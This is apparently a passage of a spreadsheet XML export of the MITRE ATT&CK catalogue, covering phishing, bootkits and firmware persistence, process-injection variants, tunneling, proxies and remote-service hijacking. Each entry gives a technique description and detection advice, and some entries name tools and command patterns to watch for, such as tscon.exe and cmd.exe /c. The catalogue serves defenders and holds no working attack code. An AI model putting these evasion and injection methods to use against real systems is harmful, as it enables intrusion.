    <s v="T1566"/>
    <s v="Philip Winther"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1566.002"/>
    <x v="380"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1566/002"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="2.1"/>
    <x v="15"/>
    <s v="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_x000a__x000a_Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)_x000a__x000a_Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs."/>
    <s v="Google Workspace, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1566"/>
    <s v="Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Philip Winther; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1566.003"/>
    <x v="381"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1566/003"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2020-10-18T00:00:00"/>
    <n v="2"/>
    <x v="15"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1566"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1542"/>
    <x v="382"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1542"/>
    <d v="2019-11-13T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)"/>
    <s v="Linux, Network, Windows"/>
    <s v="Command: Command Execution, Drive: Drive Modification, Driver: Driver Metadata, Firmware: Firmware Modification, Network Traffic: Network Connection Creation, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="Anti-virus, File monitoring, Host intrusion prevention systems"/>
    <m/>
  </r>
  <r>
    <s v="T1542.003"/>
    <x v="383"/>
    <s v="Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly._x000a__x000a_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_x000a__x000a_The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code."/>
    <s v="https://attack.mitre.org/techniques/T1542/003"/>
    <d v="2019-12-19T00:00:00"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="9"/>
    <s v="Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis."/>
    <s v="Linux, Windows"/>
    <s v="Drive: Drive Modification"/>
    <b v="1"/>
    <s v="T1542"/>
    <m/>
    <m/>
    <s v="Anti-virus, File monitoring, Host intrusion prevention systems"/>
    <m/>
  </r>
  <r>
    <s v="T1542.002"/>
    <x v="384"/>
    <s v="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_x000a__x000a_Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks."/>
    <s v="https://attack.mitre.org/techniques/T1542/002"/>
    <d v="2019-12-19T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Driver: Driver Metadata, Firmware: Firmware Modification, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1542"/>
    <m/>
    <m/>
    <s v="Anti-virus, File monitoring, Host intrusion prevention systems"/>
    <m/>
  </r>
  <r>
    <s v="T1542.004"/>
    <x v="385"/>
    <s v="Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)_x000a__x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1542/004"/>
    <d v="2020-10-20T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="9"/>
    <s v="There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation."/>
    <s v="Network"/>
    <s v="Firmware: Firmware Modification"/>
    <b v="1"/>
    <s v="T1542"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1542.001"/>
    <x v="386"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1542/001"/>
    <d v="2019-12-19T00:00:00"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="1"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Firmware: Firmware Modification"/>
    <b v="1"/>
    <s v="T1542"/>
    <s v="Jean-Ian Boutin, ESET; McAfee; Ryan Becwar"/>
    <m/>
    <s v="Anti-virus, File monitoring, Host intrusion prevention systems"/>
    <m/>
  </r>
  <r>
    <s v="T1542.005"/>
    <x v="387"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1542/005"/>
    <d v="2020-10-20T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
    <s v="Network"/>
    <s v="Command: Command Execution, Firmware: Firmware Modification, Network Traffic: Network Connection Creation"/>
    <b v="1"/>
    <s v="T1542"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1057"/>
    <x v="388"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1057"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-26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b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1055"/>
    <x v="389"/>
    <s v="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_x000a__x000a_There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. _x000a__x000a_More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. "/>
    <s v="https://attack.mitre.org/techniques/T1055"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1.100000000000000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_x000a__x000a_Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. _x000a__x000a_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_x000a__x000a_Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) _x000a__x000a_Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. "/>
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access"/>
    <b v="0"/>
    <m/>
    <s v="Anastasios Pingios; Christiaan Beek, @ChristiaanBeek; Ryan Becwar"/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.004"/>
    <x v="390"/>
    <s v="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_x000a__x000a_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_x000a__x000a_A variation of APC injection, dubbed &quot;Early Bird injection&quot;,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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
    <s v="https://attack.mitre.org/techniques/T1055/004"/>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m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.001"/>
    <x v="391"/>
    <s v="Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  _x000a__x000a_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_x000a__x000a_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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
    <s v="https://attack.mitre.org/techniques/T1055/001"/>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_x000a__x000a_Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. _x000a__x000a_Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. "/>
    <s v="Windows"/>
    <s v="Module: Module Load, Process: OS API Execution, Process: Process Access"/>
    <b v="1"/>
    <s v="T1055"/>
    <m/>
    <s v="User"/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.011"/>
    <x v="392"/>
    <s v="Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
    <s v="https://attack.mitre.org/techniques/T1055/011"/>
    <d v="2020-01-14T00:00:00"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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
    <s v="Windows"/>
    <s v="Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1055"/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.002"/>
    <x v="393"/>
    <s v="Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. "/>
    <s v="https://attack.mitre.org/techniques/T1055/002"/>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s v="User"/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.009"/>
    <x v="394"/>
    <s v="Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1055/009"/>
    <d v="2020-01-14T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. _x000a__x000a_Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. "/>
    <s v="Linux"/>
    <s v="File: File Modification"/>
    <b v="1"/>
    <s v="T1055"/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.013"/>
    <x v="395"/>
    <s v="Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)_x000a__x000a_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_x000a__x000a_Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):_x000a__x000a_* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction._x000a_* Load – Create a shared section of memory and load the malicious executable._x000a_* Rollback – Undo changes to original executable, effectively removing malicious code from the file system._x000a_* Animate – Create a process from the tainted section of memory and initiate execution._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1055/013"/>
    <d v="2020-01-14T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior."/>
    <s v="Windows"/>
    <s v="File: File Metadata, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1055"/>
    <m/>
    <s v="Administrator, SYSTEM, User"/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.012"/>
    <x v="396"/>
    <s v="Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  _x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1055/012"/>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s v="User"/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.008"/>
    <x v="397"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Ptrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes.(Citation: BH Linux Inject) _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1055/008"/>
    <d v="2020-01-14T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. "/>
    <s v="Linux"/>
    <s v="Process: OS API Execution, Process: Process Access"/>
    <b v="1"/>
    <s v="T1055"/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.003"/>
    <x v="398"/>
    <s v="Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. _x000a__x000a_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_x000a__x000a_This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1055/003"/>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s v="User"/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.005"/>
    <x v="399"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1055/005"/>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m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1055.014"/>
    <x v="400"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  "/>
    <s v="https://attack.mitre.org/techniques/T1055/014"/>
    <d v="2020-01-14T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. "/>
    <s v="Linux"/>
    <s v="Module: Module Load, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1055"/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1572"/>
    <x v="401"/>
    <s v="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_x000a__x000a_There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) _x000a__x000a_[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_x000a__x000a_Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. "/>
    <s v="https://attack.mitre.org/techniques/T1572"/>
    <d v="2020-03-15T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. 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s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1090"/>
    <x v="402"/>
    <s v="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_x000a__x000a_Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic."/>
    <s v="https://attack.mitre.org/techniques/T1090"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="3.1"/>
    <x v="6"/>
    <s v="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_x000a__x000a_Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183))."/>
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Brian Prange; Heather Linn; Walker Johnson"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1090.004"/>
    <x v="403"/>
    <s v="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quot;domainless&quot; fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored)._x000a__x000a_For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y."/>
    <s v="https://attack.mitre.org/techniques/T1090/004"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="6"/>
    <s v="If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)"/>
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content"/>
    <b v="1"/>
    <s v="T1090"/>
    <s v="Matt Kelly, @breakersall"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1090.002"/>
    <x v="404"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1090/002"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1090"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1090.001"/>
    <x v="405"/>
    <s v="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_x000a__x000a_By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems."/>
    <s v="https://attack.mitre.org/techniques/T1090/001"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-15T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1090"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1090.003"/>
    <x v="406"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1090/003"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="2"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1090"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1012"/>
    <x v="407"/>
    <s v="Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1012"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-26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s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1219"/>
    <x v="408"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)"/>
    <s v="https://attack.mitre.org/techniques/T1219"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="2"/>
    <x v="6"/>
    <s v="Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.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_x000a__x000a_[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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Matt Kelly, @breakersall"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1563"/>
    <x v="409"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1563"/>
    <d v="2020-02-25T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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_x000a__x000a_Monitor for processes and command-line arguments associated with hijacking service sessions."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1563.002"/>
    <x v="410"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1563/002"/>
    <d v="2020-02-25T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking._x000a__x000a_Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1563"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1563.001"/>
    <x v="411"/>
    <s v="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_x000a__x000a_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_x000a__x000a_[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078)."/>
    <s v="https://attack.mitre.org/techniques/T1563/001"/>
    <d v="2020-02-25T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1563"/>
    <s v="Anastasios Pingios"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1021"/>
    <x v="412"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1021"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="17"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Logon Session: Logon Session Creation, Module: Module Load, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1021.003"/>
    <x v="413"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user._x000a__x000a_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_x000a__x000a_Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1021/003"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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_x000a__x000a_Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic."/>
    <s v="Windows"/>
    <s v="Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1021"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1021.001"/>
    <x v="414"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1021/001"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-02-25T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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
    <s v="Windows"/>
    <s v="Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1021"/>
    <s v="Matthew Demaske, Adaptforward"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1021.002"/>
    <x v="415"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user._x000a__x000a_SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1021/002"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Logon Session: Logon Session Creation, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1021"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1021.004"/>
    <x v="416"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1021/004"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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s v="Linux, macOS"/>
    <s v="Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1021"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1021.005"/>
    <x v="417"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1021/005"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1021"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1021.006"/>
    <x v="418"/>
    <s v="Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1021/006"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="17"/>
    <s v="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s v="Windows"/>
    <s v="Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1021"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1018"/>
    <x v="419"/>
    <s v="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_x000a__x000a_Specific to macOS, the &lt;code&gt;bonjour&lt;/code&gt; protocol exists to discover additional Mac-based systems within the same broadcast domain."/>
    <s v="https://attack.mitre.org/techniques/T1018"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-13T00:00:00"/>
